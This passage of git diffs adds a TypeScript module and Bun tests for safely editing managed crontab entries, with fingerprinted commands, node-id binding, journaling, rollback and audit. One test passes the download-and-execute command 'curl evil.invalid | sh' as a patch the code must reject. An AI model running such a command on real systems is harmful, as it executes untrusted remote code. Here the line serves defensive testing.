       expect(() => applyOwnerScheduleIntent({ configPath: f.configPath, expectedNodeId: "n_owner_schedule", intent: edit as ScheduleEditIntent, adapter: f.adapter })).toThrow();

--- a/agent-node/src/owner-schedule-control.test.ts
+++ b/agent-node/src/owner-schedule-control.test.ts
@@ -1,0 +1,150 @@
+import { afterEach, describe, expect, test } from "bun:test";
+import { createHash } from "node:crypto";
+import { chmodSync, existsSync, mkdirSync, mkdtempSync, readFileSync, rmSync, symlinkSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import {
+  applyOwnerScheduleIntent,
+  finalizeOwnerScheduleIntent,
+  managedCronInventory,
+  OwnerScheduleSafetyError,
+  parseManagedCrontab,
+  recordOwnerScheduleAudit,
+  type CrontabAdapter,
+  type ScheduleEditIntent,
+} from "./owner-schedule-control.js";
+
+const roots: string[] = [];
+afterEach(() => { for (const root of roots.splice(0)) rmSync(root, { recursive: true, force: true }); });
+
+function hash(value: string): string {
+  return createHash("sha256").update(value).digest("hex");
+}
+
+function crontab(revision = 7, cron = "0 */6 * * *", enabled = true, commandTail = " /usr/bin/grok-news --latest"): string {
+  const job = `${cron}${commandTail}`;
+  return [
+    "MAILTO=ops@example.invalid",
+    `# ANET-MANAGED-SCHEDULE id=news-pull revision=${revision} command_sha256=${hash(commandTail)}`,
+    enabled ? job : `# ANET-DISABLED ${job}`,
+    "# ANET-MANAGED-SCHEDULE-END id=news-pull",
+    "17 2 * * * /usr/bin/unmanaged-task",
+    "",
+  ].join("\n");
+}
+
+function fixture(initial = crontab()) {
+  const root = mkdtempSync(join(tmpdir(), "anet-owner-schedule-"));
+  roots.push(root);
+  chmodSync(root, 0o700);
+  const configPath = join(root, "config.json");
+  writeFileSync(configPath, "{}\n", { mode: 0o600 });
+  let current = initial;
+  let installs = 0;
+  const adapter: CrontabAdapter = {
+    read: () => current,
+    install: (value) => { installs += 1; current = value; },
+  };
+  return { root, configPath, adapter, current: () => current, installs: () => installs };
+}
+
+function intent(patch: Record<string, unknown> = { cron: "0 */12 * * *", enabled: false }): ScheduleEditIntent {
+  return {
+    intent_id: "sei_12345678-1234-1234-1234-123456789abc",
+    node_id: "n_owner_schedule",
+    schedule_id: "news-pull",
+    base_revision: 7,
+    patch,
+  };
+}
+
+describe("owner schedule managed-cron control", () => {
+  test("parses only exact managed markers and publishes bounded inventory", () => {
+    const f = fixture();
+    const parsed = parseManagedCrontab(f.current()).get("news-pull")!;
+    expect(parsed).toMatchObject({ revision: 7, enabled: true, cron: "0 */6 * * *" });
+    expect(parsed.commandTail).toBe(" /usr/bin/grok-news --latest");
+    expect(managedCronInventory(f.adapter).get("news-pull")).toEqual({ cron: "0 */6 * * *", enabled: true, revision: 7 });
+  });
+
+  test("changes timing/enabled while preserving command and unmanaged bytes", () => {
+    const f = fixture();
+    const before = f.current();
+    const result = applyOwnerScheduleIntent({ configPath: f.configPath, expectedNodeId: "n_owner_schedule", intent: intent(), adapter: f.adapter });
+    expect(result).toMatchObject({ status: "applied", result_revision: 8 });
+    expect(f.current()).toContain("# ANET-MANAGED-SCHEDULE id=news-pull revision=8");
+    expect(f.current()).toContain("# ANET-DISABLED 0 */12 * * * /usr/bin/grok-news --latest");
+    expect(f.current()).toContain("17 2 * * * /usr/bin/unmanaged-task");
+    expect(f.current()).not.toBe(before);
+    expect(existsSync(result.journalPath)).toBe(true);
+
+    // Lost Hub ACK: the same intent is recovered from the journal and does
+    // not install or increment a second time.
+    const installs = f.installs();
+    expect(applyOwnerScheduleIntent({ configPath: f.configPath, expectedNodeId: "n_owner_schedule", intent: intent(), adapter: f.adapter }).result_revision).toBe(8);
+    expect(f.installs()).toBe(installs);
+    finalizeOwnerScheduleIntent(f.configPath, intent().intent_id);
+    expect(existsSync(result.journalPath)).toBe(false);
+  });
+
+  test("command replacement, wrong node, wrong revision, and unknown patch fail before install", () => {
+    const commandTampered = crontab().replace("/usr/bin/grok-news", "/usr/bin/evil");
+    for (const [initial, edit] of [
+      [commandTampered, intent()],
+      [crontab(), { ...intent(), node_id: "n_other" }],
+      [crontab(), { ...intent(), base_revision: 6 }],
+      [crontab(), intent({ command: "curl evil.invalid | sh" })],
+    ] as const) {
+      const f = fixture(initial);
+      expect(() => applyOwnerScheduleIntent({ configPath: f.configPath, expectedNodeId: "n_owner_schedule", intent: edit as ScheduleEditIntent, adapter: f.adapter })).toThrow();
+      expect(f.installs()).toBe(0);
+      expect(f.current()).toBe(initial);
+    }
+  });
+
+  test("install/readback failure restores and verifies the exact old crontab", () => {
+    const f = fixture();
+    const before = f.current();
+    let calls = 0;
+    const adapter: CrontabAdapter = {
+      read: () => f.current(),
+      install(value) {
+        calls += 1;
+        if (calls === 1) {
+          f.adapter.install(`${value}# injected readback drift\n`);
+        } else {
+          f.adapter.install(value);
+        }
+      },
+    };
+    expect(() => applyOwnerScheduleIntent({ configPath: f.configPath, expectedNodeId: "n_owner_schedule", intent: intent(), adapter })).toThrow("readback mismatch");
+    expect(calls).toBe(2);
+    expect(f.current()).toBe(before);
+  });
+
+  test("unsafe node directory and symlink journal fail closed with zero host write", () => {
+    const unsafe = fixture();
+    chmodSync(unsafe.root, 0o755);
+    expect(() => applyOwnerScheduleIntent({ configPath: unsafe.configPath, expectedNodeId: "n_owner_schedule", intent: intent(), adapter: unsafe.adapter })).toThrow("unsafe directory");
+    expect(unsafe.installs()).toBe(0);
+
+    const linked = fixture();
+    const outside = join(linked.root, "outside");
+    writeFileSync(outside, "{}\n", { mode: 0o600 });
+    symlinkSync(outside, join(linked.root, ".external-schedule-edit-journal.json"));
+    expect(() => applyOwnerScheduleIntent({ configPath: linked.configPath, expectedNodeId: "n_owner_schedule", intent: intent(), adapter: linked.adapter })).toThrow(OwnerScheduleSafetyError);
+    expect(linked.installs()).toBe(0);
+  });
+
+  test("local audit is minimal, private and idempotent", () => {
+    const f = fixture();
+    const row = { intent_id: intent().intent_id, schedule_id: "news-pull", base_revision: 7, status: "applied" as const, result_revision: 8 };
+    recordOwnerScheduleAudit(f.configPath, row);
+    recordOwnerScheduleAudit(f.configPath, row);
+    const raw = readFileSync(join(f.root, ".external-schedule-edit-audit.jsonl"), "utf8");
+    expect(raw.trim().split("\n")).toHaveLength(1);
+    expect(raw).not.toContain("grok-news");
+    expect(raw).not.toContain("command");
+    expect(raw).not.toContain("token");
+  });
+});

--- a/agent-node/src/owner-schedule-control.ts
+++ b/agent-node/src/owner-schedule-control.ts
@@ -20,12 +20,13 @@ const JOURNAL_NAME = ".external-schedule-edit-journal.json";
 const AUDIT_NAME = ".external-schedule-edit-audit.jsonl";
 const MAX_AUDIT_BYTES = 1024 * 1024;
 const ID_RE = /^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$/;
-const BEGIN_RE = /^# ANET-MANAGED-SCHEDULE id=([A-Za-z0-9][A-Za-z0-9._-]{0,127}) revision=(\d+) command_sha256=([0-9a-f]{64})$/;
+const BEGIN_RE = /^# ANET-MANAGED-SCHEDULE node_id=([A-Za-z0-9][A-Za-z0-9._-]{0,199}) id=([A-Za-z0-9][A-Za-z0-9._-]{0,127}) revision=(\d+) command_sha256=([0-9a-f]{64})$/;
 const DISABLED_PREFIX = "# ANET-DISABLED ";
 
 export class OwnerScheduleSafetyError extends Error {}
 
 export type ManagedCronEntry = {
+  nodeId: string;
   id: string;
   revision: number;
   enabled: boolean;
@@ -133,7 +134,10 @@ function removeJournal(path: string): void {
   try { fsyncSync(parentFd); } finally { closeSync(parentFd); }
 }
 
-export function parseManagedCrontab(content: string): Map<string, ManagedCronEntry> {
+export function parseManagedCrontab(content: string, expectedNodeId: string): Map<string, ManagedCronEntry> {
+  if (!/^[A-Za-z0-9][A-Za-z0-9._-]{0,199}$/.test(expectedNodeId)) {
+    throw new OwnerScheduleSafetyError("invalid managed cron node id");
+  }
   if (Buffer.byteLength(content) > MAX_CRONTAB_BYTES || /[\r\0]/.test(content)) {
     throw new OwnerScheduleSafetyError("unsafe crontab content");
   }
@@ -142,10 +146,11 @@ export function parseManagedCrontab(content: string): Map<string, ManagedCronEnt
   for (let index = 0; index < lines.length; index += 1) {
     const begin = lines[index].match(BEGIN_RE);
     if (!begin) continue;
-    const id = begin[1];
-    const revision = Number(begin[2]);
-    const commandSha256 = begin[3];
-    if (!Number.isSafeInteger(revision) || result.has(id) || index + 2 >= lines.length) {
+    const nodeId = begin[1];
+    const id = begin[2];
+    const revision = Number(begin[3]);
+    const commandSha256 = begin[4];
+    if (!Number.isSafeInteger(revision) || index + 2 >= lines.length) {
       throw new OwnerScheduleSafetyError("invalid managed cron marker");
     }
     const rawJob = lines[index + 1];
@@ -155,9 +160,15 @@ export function parseManagedCrontab(content: string): Map<string, ManagedCronEnt
     if (!match) throw new OwnerScheduleSafetyError("managed cron must contain exactly one job line");
     const cron = parseManagedCronExpression(match[1].replace(/[ \t]+/g, " "));
     if (sha256(match[2]) !== commandSha256) throw new OwnerScheduleSafetyError("managed cron command fingerprint mismatch");
-    const end = `# ANET-MANAGED-SCHEDULE-END id=${id}`;
+    const end = `# ANET-MANAGED-SCHEDULE-END node_id=${nodeId} id=${id}`;
     if (lines[index + 2] !== end) throw new OwnerScheduleSafetyError("invalid managed cron end marker");
+    if (nodeId !== expectedNodeId) {
+      index += 2;
+      continue;
+    }
+    if (result.has(id)) throw new OwnerScheduleSafetyError("duplicate managed cron marker");
     result.set(id, {
+      nodeId,
       id,
       revision,
       enabled,
@@ -193,7 +204,7 @@ function renderEdit(content: string, entry: ManagedCronEntry, patch: ExternalSch
   const cron = patch.cron ?? entry.cron;
   const enabled = patch.enabled ?? entry.enabled;
   const job = `${cron}${entry.commandTail}`;
-  lines[entry.beginLine] = `# ANET-MANAGED-SCHEDULE id=${entry.id} revision=${entry.revision + 1} command_sha256=${entry.commandSha256}`;
+  lines[entry.beginLine] = `# ANET-MANAGED-SCHEDULE node_id=${entry.nodeId} id=${entry.id} revision=${entry.revision + 1} command_sha256=${entry.commandSha256}`;
   lines[entry.jobLine] = enabled ? job : `${DISABLED_PREFIX}${job}`;
   return lines.join("\n");
 }
@@ -230,7 +241,7 @@ export function applyOwnerScheduleIntent(options: {
   }
 
   const before = existingJournal?.before_content ?? adapter.read();
-  const entry = parseManagedCrontab(before).get(intent.schedule_id);
+  const entry = parseManagedCrontab(before, expectedNodeId).get(intent.schedule_id);
   if (!entry) throw new OwnerScheduleSafetyError("schedule is not managed");
   if (entry.revision !== intent.base_revision) throw new OwnerScheduleSafetyError("revision conflict");
   const after = existingJournal?.after_content ?? renderEdit(before, entry, patch);
@@ -325,9 +336,9 @@ export function recordOwnerScheduleAudit(configPath: string, entry: {
   } finally { closeSync(fd); }
 }
 
-export function managedCronInventory(adapter: CrontabAdapter = systemCrontabAdapter()): Map<string, Pick<ManagedCronEntry, "cron" | "enabled" | "revision">> {
+export function managedCronInventory(expectedNodeId: string, adapter: CrontabAdapter = systemCrontabAdapter()): Map<string, Pick<ManagedCronEntry, "cron" | "enabled" | "revision">> {
   const result = new Map<string, Pick<ManagedCronEntry, "cron" | "enabled" | "revision">>();
-  for (const [id, entry] of parseManagedCrontab(adapter.read())) {
+  for (const [id, entry] of parseManagedCrontab(adapter.read(), expectedNodeId)) {
     result.set(id, { cron: entry.cron, enabled: entry.enabled, revision: entry.revision });
   }
   return result;

--- a/agent-node/src/owner-schedule-control.ts
+++ b/agent-node/src/owner-schedule-control.ts
@@ -1,0 +1,334 @@
+import {
+  closeSync,
+  constants,
+  fchmodSync,
+  fstatSync,
+  fsyncSync,
+  lstatSync,
+  openSync,
+  readFileSync,
+  rmSync,
+  writeFileSync,
+} from "node:fs";
+import { createHash } from "node:crypto";
+import { spawnSync } from "node:child_process";
+import { dirname, join } from "node:path";
+import { parseExternalSchedulePatch, parseManagedCronExpression, type ExternalSchedulePatch } from "./shared/external-schedule-contract.js";
+
+const MAX_CRONTAB_BYTES = 1024 * 1024;
+const JOURNAL_NAME = ".external-schedule-edit-journal.json";
+const AUDIT_NAME = ".external-schedule-edit-audit.jsonl";
+const MAX_AUDIT_BYTES = 1024 * 1024;
+const ID_RE = /^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$/;
+const BEGIN_RE = /^# ANET-MANAGED-SCHEDULE id=([A-Za-z0-9][A-Za-z0-9._-]{0,127}) revision=(\d+) command_sha256=([0-9a-f]{64})$/;
+const DISABLED_PREFIX = "# ANET-DISABLED ";
+
+export class OwnerScheduleSafetyError extends Error {}
+
+export type ManagedCronEntry = {
+  id: string;
+  revision: number;
+  enabled: boolean;
+  cron: string;
+  commandTail: string;
+  commandSha256: string;
+  beginLine: number;
+  jobLine: number;
+  endLine: number;
+};
+
+export type ScheduleEditIntent = {
+  intent_id: string;
+  node_id: string;
+  schedule_id: string;
+  base_revision: number;
+  patch: ExternalSchedulePatch;
+};
+
+export type CrontabAdapter = {
+  read(): string;
+  install(content: string): void;
+};
+
+type Journal = {
+  schema: 1;
+  intent_id: string;
+  schedule_id: string;
+  base_revision: number;
+  result_revision: number;
+  before_sha256: string;
+  after_sha256: string;
+  before_content: string;
+  after_content: string;
+};
+
+function sha256(value: string): string {
+  return createHash("sha256").update(value).digest("hex");
+}
+
+function sameIdentity(a: ReturnType<typeof lstatSync>, b: ReturnType<typeof lstatSync>): boolean {
+  return a.dev === b.dev && a.ino === b.ino;
+}
+
+function assertPrivateDirectory(path: string): void {
+  const stat = lstatSync(path);
+  const uid = process.getuid?.();
+  if (!stat.isDirectory() || stat.isSymbolicLink() || uid === undefined || stat.uid !== uid || (stat.mode & 0o077) !== 0) {
+    throw new OwnerScheduleSafetyError(`owner schedule control refuses unsafe directory: ${path}`);
+  }
+}
+
+function readJournal(path: string): Journal | null {
+  let before: ReturnType<typeof lstatSync>;
+  try { before = lstatSync(path); } catch (error: any) {
+    if (error?.code === "ENOENT") return null;
+    throw error;
+  }
+  const uid = process.getuid?.();
+  if (!before.isFile() || before.isSymbolicLink() || before.nlink !== 1 || uid === undefined || before.uid !== uid || (before.mode & 0o177) !== 0) {
+    throw new OwnerScheduleSafetyError("owner schedule control refuses unsafe journal");
+  }
+  const fd = openSync(path, constants.O_RDONLY | (constants.O_NOFOLLOW || 0));
+  try {
+    const opened = fstatSync(fd);
+    if (!sameIdentity(before, opened) || opened.size > 2 * MAX_CRONTAB_BYTES) {
+      throw new OwnerScheduleSafetyError("owner schedule journal changed during read");
+    }
+    const parsed = JSON.parse(readFileSync(fd, "utf8")) as Journal;
+    if (parsed?.schema !== 1 || !ID_RE.test(parsed.schedule_id) || !/^sei_[0-9a-f-]+$/.test(parsed.intent_id)
+      || !Number.isSafeInteger(parsed.base_revision) || parsed.result_revision !== parsed.base_revision + 1
+      || sha256(parsed.before_content) !== parsed.before_sha256 || sha256(parsed.after_content) !== parsed.after_sha256) {
+      throw new OwnerScheduleSafetyError("invalid owner schedule journal");
+    }
+    return parsed;
+  } finally { closeSync(fd); }
+}
+
+function writeJournal(path: string, journal: Journal): void {
+  const parent = dirname(path);
+  assertPrivateDirectory(parent);
+  let fd: number | undefined;
+  try {
+    // O_EXCL is the no-overwrite publication primitive. A partial journal
+    // after process death is intentionally fail-closed and blocks host writes.
+    fd = openSync(path, constants.O_WRONLY | constants.O_CREAT | constants.O_EXCL | (constants.O_NOFOLLOW || 0), 0o600);
+    writeFileSync(fd, JSON.stringify(journal) + "\n", "utf8");
+    fchmodSync(fd, 0o600);
+    fsyncSync(fd);
+    closeSync(fd);
+    fd = undefined;
+    const parentFd = openSync(parent, constants.O_RDONLY | (constants.O_DIRECTORY || 0) | (constants.O_NOFOLLOW || 0));
+    try { fsyncSync(parentFd); } finally { closeSync(parentFd); }
+  } catch (error) {
+    if (fd !== undefined) try { closeSync(fd); } catch {}
+    throw error;
+  }
+}
+
+function removeJournal(path: string): void {
+  const journal = readJournal(path);
+  if (!journal) return;
+  rmSync(path);
+  const parentFd = openSync(dirname(path), constants.O_RDONLY | (constants.O_DIRECTORY || 0) | (constants.O_NOFOLLOW || 0));
+  try { fsyncSync(parentFd); } finally { closeSync(parentFd); }
+}
+
+export function parseManagedCrontab(content: string): Map<string, ManagedCronEntry> {
+  if (Buffer.byteLength(content) > MAX_CRONTAB_BYTES || /[\r\0]/.test(content)) {
+    throw new OwnerScheduleSafetyError("unsafe crontab content");
+  }
+  const lines = content.split("\n");
+  const result = new Map<string, ManagedCronEntry>();
+  for (let index = 0; index < lines.length; index += 1) {
+    const begin = lines[index].match(BEGIN_RE);
+    if (!begin) continue;
+    const id = begin[1];
+    const revision = Number(begin[2]);
+    const commandSha256 = begin[3];
+    if (!Number.isSafeInteger(revision) || result.has(id) || index + 2 >= lines.length) {
+      throw new OwnerScheduleSafetyError("invalid managed cron marker");
+    }
+    const rawJob = lines[index + 1];
+    const enabled = !rawJob.startsWith(DISABLED_PREFIX);
+    const job = enabled ? rawJob : rawJob.slice(DISABLED_PREFIX.length);
+    const match = job.match(/^(\S+(?:[ \t]+\S+){4})([ \t]+.+)$/);
+    if (!match) throw new OwnerScheduleSafetyError("managed cron must contain exactly one job line");
+    const cron = parseManagedCronExpression(match[1].replace(/[ \t]+/g, " "));
+    if (sha256(match[2]) !== commandSha256) throw new OwnerScheduleSafetyError("managed cron command fingerprint mismatch");
+    const end = `# ANET-MANAGED-SCHEDULE-END id=${id}`;
+    if (lines[index + 2] !== end) throw new OwnerScheduleSafetyError("invalid managed cron end marker");
+    result.set(id, {
+      id,
+      revision,
+      enabled,
+      cron,
+      commandTail: match[2],
+      commandSha256,
+      beginLine: index,
+      jobLine: index + 1,
+      endLine: index + 2,
+    });
+    index += 2;
+  }
+  return result;
+}
+
+export function systemCrontabAdapter(): CrontabAdapter {
+  return {
+    read(): string {
+      const result = spawnSync("crontab", ["-l"], { encoding: "utf8", maxBuffer: MAX_CRONTAB_BYTES + 1 });
+      if (result.status === 0) return result.stdout;
+      if (result.status === 1 && /no crontab/i.test(result.stderr || "")) return "";
+      throw new OwnerScheduleSafetyError("crontab read failed");
+    },
+    install(content: string): void {
+      const result = spawnSync("crontab", ["-"], { input: content, encoding: "utf8", maxBuffer: MAX_CRONTAB_BYTES + 1 });
+      if (result.status !== 0) throw new OwnerScheduleSafetyError("crontab install failed");
+    },
+  };
+}
+
+function renderEdit(content: string, entry: ManagedCronEntry, patch: ExternalSchedulePatch): string {
+  const lines = content.split("\n");
+  const cron = patch.cron ?? entry.cron;
+  const enabled = patch.enabled ?? entry.enabled;
+  const job = `${cron}${entry.commandTail}`;
+  lines[entry.beginLine] = `# ANET-MANAGED-SCHEDULE id=${entry.id} revision=${entry.revision + 1} command_sha256=${entry.commandSha256}`;
+  lines[entry.jobLine] = enabled ? job : `${DISABLED_PREFIX}${job}`;
+  return lines.join("\n");
+}
+
+export function applyOwnerScheduleIntent(options: {
+  configPath: string;
+  expectedNodeId: string;
+  intent: ScheduleEditIntent;
+  adapter?: CrontabAdapter;
+}): { status: "applied"; result_revision: number; journalPath: string } {
+  const { configPath, expectedNodeId, intent } = options;
+  if (!configPath || !expectedNodeId || intent.node_id !== expectedNodeId || !/^sei_[0-9a-f-]+$/.test(intent.intent_id)
+    || !ID_RE.test(intent.schedule_id) || !Number.isSafeInteger(intent.base_revision) || intent.base_revision < 0) {
+    throw new OwnerScheduleSafetyError("invalid schedule edit intent");
+  }
+  const patch = parseExternalSchedulePatch(intent.patch);
+  const nodeDir = dirname(configPath);
+  assertPrivateDirectory(nodeDir);
+  const journalPath = join(nodeDir, JOURNAL_NAME);
+  const adapter = options.adapter ?? systemCrontabAdapter();
+  const existingJournal = readJournal(journalPath);
+  if (existingJournal) {
+    if (existingJournal.intent_id !== intent.intent_id || existingJournal.schedule_id !== intent.schedule_id
+      || existingJournal.base_revision !== intent.base_revision) {
+      throw new OwnerScheduleSafetyError("owner schedule recovery required");
+    }
+    const currentHash = sha256(adapter.read());
+    if (currentHash === existingJournal.after_sha256) {
+      return { status: "applied", result_revision: existingJournal.result_revision, journalPath };
+    }
+    if (currentHash !== existingJournal.before_sha256) {
+      throw new OwnerScheduleSafetyError("owner schedule recovery conflict");
+    }
+  }
+
+  const before = existingJournal?.before_content ?? adapter.read();
+  const entry = parseManagedCrontab(before).get(intent.schedule_id);
+  if (!entry) throw new OwnerScheduleSafetyError("schedule is not managed");
+  if (entry.revision !== intent.base_revision) throw new OwnerScheduleSafetyError("revision conflict");
+  const after = existingJournal?.after_content ?? renderEdit(before, entry, patch);
+  const journal = existingJournal ?? {
+    schema: 1 as const,
+    intent_id: intent.intent_id,
+    schedule_id: intent.schedule_id,
+    base_revision: intent.base_revision,
+    result_revision: intent.base_revision + 1,
+    before_sha256: sha256(before),
+    after_sha256: sha256(after),
+    before_content: before,
+    after_content: after,
+  };
+  if (!existingJournal) writeJournal(journalPath, journal);
+  try {
+    adapter.install(after);
+    if (sha256(adapter.read()) !== journal.after_sha256) throw new OwnerScheduleSafetyError("crontab readback mismatch");
+    return { status: "applied", result_revision: journal.result_revision, journalPath };
+  } catch (error) {
+    try {
+      adapter.install(before);
+      if (sha256(adapter.read()) !== journal.before_sha256) throw new OwnerScheduleSafetyError("crontab rollback verification failed");
+    } catch (rollbackError) {
+      throw new OwnerScheduleSafetyError(`owner schedule rollback failed: ${String(rollbackError)}`);
+    }
+    throw error;
+  }
+}
+
+/** Delete the recovery record only after Hub accepted the terminal ACK. */
+export function finalizeOwnerScheduleIntent(configPath: string, expectedIntentId: string): void {
+  const path = join(dirname(configPath), JOURNAL_NAME);
+  const journal = readJournal(path);
+  if (!journal) return;
+  if (journal.intent_id !== expectedIntentId) throw new OwnerScheduleSafetyError("journal intent mismatch");
+  removeJournal(path);
+}
+
+/**
+ * Persist a field-minimized local audit after Hub accepted the terminal ACK.
+ * Command bytes, host paths and credentials are deliberately absent.
+ */
+export function recordOwnerScheduleAudit(configPath: string, entry: {
+  intent_id: string;
+  schedule_id: string;
+  base_revision: number;
+  status: "applied" | "rejected";
+  result_revision?: number;
+  error_code?: string;
+}): void {
+  if (!/^sei_[0-9a-f-]+$/.test(entry.intent_id) || !ID_RE.test(entry.schedule_id)
+    || !Number.isSafeInteger(entry.base_revision) || entry.base_revision < 0
+    || (entry.status === "applied" && entry.result_revision !== entry.base_revision + 1)
+    || (entry.status === "rejected" && entry.result_revision !== undefined)
+    || (entry.error_code !== undefined && !/^[a-z0-9_]{1,64}$/.test(entry.error_code))) {
+    throw new OwnerScheduleSafetyError("invalid owner schedule audit entry");
+  }
+  const parent = dirname(configPath);
+  assertPrivateDirectory(parent);
+  const path = join(parent, AUDIT_NAME);
+  let existing = "";
+  try {
+    const stat = lstatSync(path);
+    const uid = process.getuid?.();
+    if (!stat.isFile() || stat.isSymbolicLink() || stat.nlink !== 1 || uid === undefined || stat.uid !== uid
+      || (stat.mode & 0o177) !== 0 || stat.size > MAX_AUDIT_BYTES) {
+      throw new OwnerScheduleSafetyError("owner schedule control refuses unsafe audit log");
+    }
+    existing = readFileSync(path, "utf8");
+  } catch (error: any) {
+    if (error?.code !== "ENOENT") throw error;
+  }
+  // ACK retry after a crash between audit fsync and journal deletion is
+  // idempotent. Match the exact JSON field, not a substring of another id.
+  if (existing.split("\n").some((line) => {
+    try { return JSON.parse(line)?.intent_id === entry.intent_id; } catch { return false; }
+  })) return;
+  const line = JSON.stringify({ schema: 1, ...entry, recorded_at: new Date().toISOString() }) + "\n";
+  if (Buffer.byteLength(existing) + Buffer.byteLength(line) > MAX_AUDIT_BYTES) {
+    throw new OwnerScheduleSafetyError("owner schedule audit log full");
+  }
+  const fd = openSync(path, constants.O_WRONLY | constants.O_CREAT | constants.O_APPEND | (constants.O_NOFOLLOW || 0), 0o600);
+  try {
+    const stat = fstatSync(fd);
+    const uid = process.getuid?.();
+    if (!stat.isFile() || stat.nlink !== 1 || uid === undefined || stat.uid !== uid || (stat.mode & 0o177) !== 0) {
+      throw new OwnerScheduleSafetyError("owner schedule control refuses unsafe audit log");
+    }
+    writeFileSync(fd, line, "utf8");
+    fsyncSync(fd);
+  } finally { closeSync(fd); }
+}
+
+export function managedCronInventory(adapter: CrontabAdapter = systemCrontabAdapter()): Map<string, Pick<ManagedCronEntry, "cron" | "enabled" | "revision">> {
+  const result = new Map<string, Pick<ManagedCronEntry, "cron" | "enabled" | "revision">>();
+  for (const [id, entry] of parseManagedCrontab(adapter.read())) {
+    result.set(id, { cron: entry.cron, enabled: entry.enabled, revision: entry.revision });
+  }
+  return result;
+}

--- a/agent-node/src/owner-schedule-system-crontab.test.ts
+++ b/agent-node/src/owner-schedule-system-crontab.test.ts
@@ -1,0 +1,49 @@
+import { afterAll, describe, expect, test } from "bun:test";
+import { createHash } from "node:crypto";
+import { chmodSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { spawnSync } from "node:child_process";
+import { applyOwnerScheduleIntent, finalizeOwnerScheduleIntent, systemCrontabAdapter } from "./owner-schedule-control.js";
+
+afterAll(() => { spawnSync("crontab", ["-r"]); });
+
+describe("owner schedule real crontab adapter", () => {
+  test("round-trips an exact managed marker through the container crontab", () => {
+    const root = mkdtempSync(join(tmpdir(), "anet-real-crontab-"));
+    chmodSync(root, 0o700);
+    const configPath = join(root, "config.json");
+    writeFileSync(configPath, "{}\n", { mode: 0o600 });
+    const tail = " /usr/bin/grok-news --latest";
+    const hash = createHash("sha256").update(tail).digest("hex");
+    const before = [
+      `# ANET-MANAGED-SCHEDULE node_id=n_real_cron id=news-pull revision=3 command_sha256=${hash}`,
+      `0 */6 * * *${tail}`,
+      "# ANET-MANAGED-SCHEDULE-END node_id=n_real_cron id=news-pull",
+      "",
+    ].join("\n");
+    const adapter = systemCrontabAdapter();
+    try {
+      adapter.install(before);
+      const result = applyOwnerScheduleIntent({
+        configPath,
+        expectedNodeId: "n_real_cron",
+        intent: {
+          intent_id: "sei_aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+          node_id: "n_real_cron",
+          schedule_id: "news-pull",
+          base_revision: 3,
+          patch: { cron: "15 */12 * * *", enabled: false },
+        },
+      });
+      const actual = adapter.read();
+      expect(actual).toContain("revision=4");
+      expect(actual).toContain(`# ANET-DISABLED 15 */12 * * *${tail}`);
+      expect(actual).not.toContain("command=");
+      finalizeOwnerScheduleIntent(configPath, result.status === "applied" ? "sei_aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee" : "");
+    } finally {
+      spawnSync("crontab", ["-r"]);
+      rmSync(root, { recursive: true, force: true });
+    }
+  });
+});

--- a/agent-node/src/owner-schedule-wiring.test.ts
+++ b/agent-node/src/owner-schedule-wiring.test.ts
@@ -19,6 +19,7 @@ describe("owner schedule process wiring", () => {
     expect(cli).toContain('if (ev.type === "external_schedule_edit")');
     expect(cli).toContain("void ownerScheduleConsumer?.trigger()");
     expect(cli).toContain("ownerControlEnabled: OWNER_SCHEDULE_CONTROL_ENABLED");
+    expect(cli).toContain("ownerNodeId: NODE_ID || undefined");
     expect((cli.match(/ownerControlEnabled: OWNER_SCHEDULE_CONTROL_ENABLED/g) ?? []).length).toBe(2);
   });
 

--- a/agent-node/src/owner-schedule-wiring.test.ts
+++ b/agent-node/src/owner-schedule-wiring.test.ts
@@ -1,0 +1,33 @@
+import { describe, expect, test } from "bun:test";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+const root = join(import.meta.dir, "../..");
+const cli = readFileSync(join(root, "agent-node/src/cli.ts"), "utf8");
+const networkCli = readFileSync(join(root, "agent-network/bin/cli.ts"), "utf8");
+
+describe("owner schedule process wiring", () => {
+  test("capability is pinned from config once and never exposed as a model tool", () => {
+    expect(cli).toContain("const OWNER_SCHEDULE_CONTROL_ENABLED = fileConfig.flags?.ownerScheduleControl === true;");
+    expect(cli).toContain("enabled: OWNER_SCHEDULE_CONTROL_ENABLED");
+    expect(cli).toContain("ownerScheduleConsumer?.stop()");
+    expect(cli).not.toContain('name: "apply_owner_schedule"');
+    expect(cli).not.toContain('name: "edit_external_schedule"');
+  });
+
+  test("SSE is only a doorbell and snapshots are editable only under the same gate", () => {
+    expect(cli).toContain('if (ev.type === "external_schedule_edit")');
+    expect(cli).toContain("void ownerScheduleConsumer?.trigger()");
+    expect(cli).toContain("ownerControlEnabled: OWNER_SCHEDULE_CONTROL_ENABLED");
+    expect((cli.match(/ownerControlEnabled: OWNER_SCHEDULE_CONTROL_ENABLED/g) ?? []).length).toBe(2);
+  });
+
+  test("new token mint paths bind the immutable node id and opt-in is explicit", () => {
+    expect(networkCli).toContain('opts["owner-schedule-control"] === "true"');
+    expect(networkCli).toContain("node_id: profile.node_id");
+    expect(networkCli).toContain("node_id: raw.node_id");
+    expect(networkCli).toContain("node_id: p.node_id");
+    expect((networkCli.match(/\/api\/auth\/node-token/g) ?? []).length).toBe(4);
+    expect((networkCli.match(/node_id: /g) ?? []).length).toBeGreaterThanOrEqual(4);
+  });
+});

--- a/agent-node/src/shared/external-schedule-contract.ts
+++ b/agent-node/src/shared/external-schedule-contract.ts
@@ -1,0 +1,60 @@
+const FIELD_BOUNDS = [
+  [0, 59],
+  [0, 23],
+  [1, 31],
+  [1, 12],
+  [0, 7],
+] as const;
+
+function integer(text: string, min: number, max: number): number {
+  if (!/^\d+$/.test(text)) throw new Error("invalid_cron");
+  const value = Number(text);
+  if (!Number.isSafeInteger(value) || value < min || value > max) throw new Error("invalid_cron");
+  return value;
+}
+
+function validateAtom(atom: string, min: number, max: number): void {
+  const [base, step, extra] = atom.split("/");
+  if (extra !== undefined || !base) throw new Error("invalid_cron");
+  if (step !== undefined) integer(step, 1, max - min + 1);
+  if (base === "*") return;
+  const range = base.split("-");
+  if (range.length === 1) {
+    integer(range[0], min, max);
+    return;
+  }
